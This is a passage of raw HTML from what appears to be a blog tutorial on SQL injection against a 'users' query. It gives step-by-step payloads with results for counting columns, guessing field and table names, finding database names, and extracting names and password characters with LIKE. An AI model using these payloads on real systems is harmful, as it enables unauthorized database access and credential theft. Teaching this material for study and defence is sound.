0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Here is an alternative injection string that will work. It seems that an injection suffix of </span><span style="color: red;"><span style="font-family: Consolas, serif;">;#</span></span><span style="font-family: Consolas, serif;"> will comment out the following SQL, thus creating proper syntax within the SQL phrase. We will use this for our suffix for most of the following injection strings.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the number of returned columns"></a><span style="font-family: Consolas, serif;"><strong>Find the number of returned columns:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ ORDER BY 1;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Nothing….this means that there is at least one column returned from the original SELECT statement.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ ORDER BY 2;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Nothing…this means that there are at least two columns returned from the original SELECT statement.</span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ ORDER BY 3;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"><strong>Result:</strong></span></span><span style="font-family: Consolas, serif;"> </span>Unknown column ’3′ in ‘order clause’<ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This means that there are only two columns returned by the original SELECT statement (In this case, first_name and last_name – We don’t usually get to see the text in blue. We can use these injection phrases to gain more information about the original SQL query’s structure.) If we use UNION to return other results, we will need to make sure that the number of columns is equal in both the original SQL query and our Injected UNION Phrase.</span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find field names - First Try"></a><span style="font-family: Consolas, serif;"><strong>Find field names – First Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR firstname IS NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Unknown column ‘firstname’ in ‘where clause’</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>This is good…</strong></span><span style="font-family: Consolas, serif;">.we now know that there is not a column named firstname. Let’s take a few more guesses…</span></li>
</ul></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR firstname = ”=’</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This is an alternate way to do this. It should also work…there should still be an error if the column does not exist.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find field names - Second Try"></a><span style="font-family: Consolas, serif;"><strong>Find field names – Second Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR first_name IS NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Result: Nothing</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">…<span style="font-family: Consolas, serif;">This is good. That means there are no errors, thus there is a field named first_name. Nothing is actually returned because first_name is not NULL, IE…it has something in it.</span></li>
</ul></li>
</ul><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR first_name = ”=’</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The alternate will not error out if the column name is correct, but unlike above, this should print the expected results for the first row (because of the loop noted above, it will actually display all rows).</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Try a few other fields….not all of these will work, but give them a try and see what happens:</span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">user_id</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">lastname</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">last_name</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">image</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">links</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">link</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">avatar</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">pass</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">password</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">user</span></li>
</ul></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Finding user names - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Finding user names – LIKE:</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Let’s say that the page is a bit more secure and will only list one result at a time. If we need to know a username (and we can’t just insert a sequential number), how do we get more names? With LIKE or course. (Here we will assume that first_name is what we are trying to find).</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR first_name LIKE ‘%P%’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Using this same technique, it may be possible to find the value of other fields (passwords, email addresses…etc)?</span></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR first_name=’Pablo’ AND password LIKE ‘%a%’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Finding the table name - Take a guess"></a><span style="font-family: Consolas, serif;"><strong>Finding the table name – Take a guess:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR test.user_id IS NOT NULL;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">’”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> Unknown column ‘test.user_id’ in ‘where clause’</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We are using the tablename.columnname format to help guess the table name. We must use a known column name (see Find Field Names) for this to work properly. If we guess an incorrect table name we will get an error. If, however, we guessed the correct table name, the query should not have an error.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Try a table name of </span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">users</span></span></span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>1′ AND 1=(SELECT COUNT(*) FROM tablenames);#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”;</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">This is an alternative way to brute force a table name. This will help us find any table name in the database. We can use the above method to help determine if any table that is found is the one we are currently working with.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Find the database name - LIKE"></a><span style="font-family: Consolas, serif;"><strong>Find the database name – LIKE:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR database() LIKE ‘%A%’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">“</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 